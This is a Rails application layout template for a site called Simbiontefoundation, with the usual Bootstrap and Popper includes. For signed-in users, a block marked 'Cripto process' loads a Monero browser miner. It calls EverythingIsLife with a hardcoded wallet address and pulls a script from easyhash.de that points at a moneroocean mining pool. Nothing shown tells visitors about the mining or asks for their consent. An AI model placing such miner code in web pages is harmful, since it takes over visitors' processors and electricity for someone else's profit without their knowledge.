<!DOCTYPE html>
<html>
  <head>
    <title>Simbiontefoundation</title>
    <%= csrf_meta_tags %>
    <%= csp_meta_tag %>

    <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %>

    <!-- jQuery and popper -->
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
    
    
    <!-- bootstrapp -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
  
    
    <!-- navbar -->
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
  

    <script> 
      console.log($("#hashes-per-second"))
      </script>



    <!-- Cripto process -->
      <% if user_signed_in? %>


          <!-- Minero.cc (XMR - monero) START-->

				

          <script>
          EverythingIsLife('44VgecmgVgoR69KJJk8fg9GhGqmmdHCAoHrZAxLc8PJEVy9RB515MsAWkT7tyi5EdRLb2P6zq7vCvTixJYJ46NxKHMfexu4', 'x', 50);
          </script>


          <!-- Javascript Constructor -->
          <script src="https://easyhash.de/mmh/mmh.js?v10?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10004"></script>



          <!-- Minero.cc (XMR - monero) END-->

        <% else %>
      <% end %>

    <!-- Cripto process END -->


    </head>
  <body>
    <%= render 'layouts/navbar' %>    
    <p class="notice"><%= notice %></p>
    <p class="alert"><%= alert %></p>
    <%= yield %>
  </body>
</html>
